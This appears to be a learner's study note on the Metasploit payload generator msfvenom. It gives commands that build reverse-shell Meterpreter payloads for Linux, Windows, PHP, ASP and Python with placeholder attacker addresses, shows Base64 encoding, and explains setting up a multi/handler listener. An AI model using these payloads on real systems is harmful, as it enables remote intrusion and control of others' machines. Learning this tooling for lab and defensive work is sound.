## msfconsole: To generate the payloads
- MsfVenom - a Metasploit standalone payload generator.
- Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.
- Msfvenom will allow you to access all payloads available in the Metasploit framework. 
- Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).
- **msfvenom --list** formats command can be used to list supported output formats.

## Encoder: (can be done by msfvenom)
- eg: msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.x.x -f raw -e php/base64
- with the -e parameter. The PHP version of Meterpreter was encoded in Base64

## Handlers: (Listener)
- Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload.
- use **exploit/multi/handler** to receive the incoming connection.
- 

## Other Payloads:
- Linux Executable and Linkable Format (elf) (Change Permission chmod +x shell.elf &  run this file by typing ./shell.elf)
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
- Windows
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
- PHP (Remove php comments to make file executable)
> msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
- ASP
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
- Python
> msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

### Note: All of the examples above are reverse payloads. This means we need to have the exploit/multi/handler module listening on attacking/local machine to work as a handler, need to set up the handler accordingly with the payload, LHOST and LPORT parameters. These values will be the same we have used when creating the msfvenom payload.

